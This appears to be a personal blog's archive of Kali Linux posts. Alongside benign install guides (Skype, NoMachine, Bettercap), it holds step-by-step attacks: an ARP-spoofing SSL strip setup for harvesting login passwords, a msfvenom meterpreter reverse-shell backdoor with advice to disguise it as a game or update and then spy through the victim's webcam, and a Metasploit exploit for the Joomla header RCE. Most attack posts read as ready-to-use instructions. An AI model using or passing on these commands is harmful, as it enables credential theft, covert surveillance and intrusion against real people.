Showing posts with label Kali. Show all posts
Showing posts with label Kali. Show all posts

Wednesday, March 22, 2017

SSL Strip

SSL Strip

Diagram:

On KALI Machine

* Open a Terminal
netdiscover

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j  REDIRECT --to-port 8080

arpspoof -i eth0 -t 10.10.1.55 -r 10.10.1.111

* Open another Terminal
sslstrip -l 8080

Once the Victim Machine access to any login website such as, Facebook, Gmail, Yahoo, we will be able to see the login name and password that store on the file sslstrip.log on Kali.

* Open another Terminal
cat sslstrip.log to see the name and password.

Monday, February 20, 2017

Install NoMachine

Install NoMachine

Install NoMachine remote desktop to Kali.

1. On Window PC
Download and install NoMachine
https://www.nomachine.com/download/download&id=17


2. On KALI
Downlaod and install NoMachine
cd ~/Downloads
https://www.nomachine.com/download/download&id=3

dpkg -i nomachine_5.2.11_1_amd64.deb

3. Start NoMachine
Start NoMachine on Windows PC and connect to Kali











Friday, May 20, 2016

Install Skype In Kali 4.0.0-kali1-amd64


dpkg --add-architecture i386

apt-get update

apt-get install libpulse0:i386

wget -O skype-install.deb http://www.skype.com/go/getskype-linux-deb

dpkg -i skype-install.deb

apt-get install -f

Done,

Saturday, May 14, 2016

Install Bettercap In Kali

 Install Bettercap In Kali

Check this out, What is bettercap: https://bettercap.org/
Log in ask root and issue the following command:
apt-get install build-essential ruby-dev libpcap-dev

If you got the similar error above add the the repository as below,

vi /etc/apt/sources.list
Add this line,
deb http://http.kali.org/kali kali-rolling main contrib non-free
Save and Run update
apt-get update

And Install again:
apt-get install build-essential ruby-dev libpcap-dev
You can easily install bettercap using the the following command:
gem install bettercap
Ok, Installaiton is finished.

Tuesday, April 26, 2016

HACK WINDOWS 8 - 8.1

HACK WINDOWS 8 - 8.1

Kali IP: 192.168.137.173
Victim IP: 192.168.137.1

1. Create a Backdoor
In Kali Open a Terminal and run this command:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.173 lport=4444 -e cmd/powershell_base64 -i 5 -f exe > /root/Desktop/backdoorr.exe

2. Start Metasploit Console
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.137.173
set lport 4444
exploit


3. Send the Backdoorr.exe to the Windows PC
Use your own style to make the Windows machine to execute your file.

Hint, you can rename to, new-game.exe, SreySarArt.exe or update.exe

Once user on Windows PC execute the file you will got 1 session opened.

 
OK, Enjoy.. with other things,
screenshot

webcam_list
webcam_snap
webcam_stream




Related to the above picture if you want to view the camera, 
Open a browser with URL:  file:///root/aPnewzuW.html 



OK, Done,

#Vannakk #Hacking #Windows-8-8.1 #Kali

Sunday, April 24, 2016

Hack Joomla

Hack Joomla

Hack Joomla

Victim Server IP: 124.124.124.178

Exploit Joomla Shell Upload RCE-CVE-2015-8562
All versions of the Joomla! below 3.4.6 are known to be vulnerable.
But exploitation is possible with PHP versions below 5.5.29, 5.6.13 and below 5.5.
######################################################################
##  VM Joomla Lab  For Testing, Download from: 
######################################################################
Login account (If you need)
User: joomla
Pass: joomla

Switch to user "root"
sudo su
(Enter user joomla's password)

# Information Gathering:
admin/admin (if you want test login)

# Finding out the Joomla version:

#Metasploit has got a scanner to find this. We can use that as well.
#Start Metasploit,
msfconsole

use exploit/multi/http/joomla_http_header_rce
set PAYLOAD php/meterpreter/bind_tcp
set RHOST 124.124.124.178
set TARGETURI /joomla/
exploit



#Vannakk #Joomla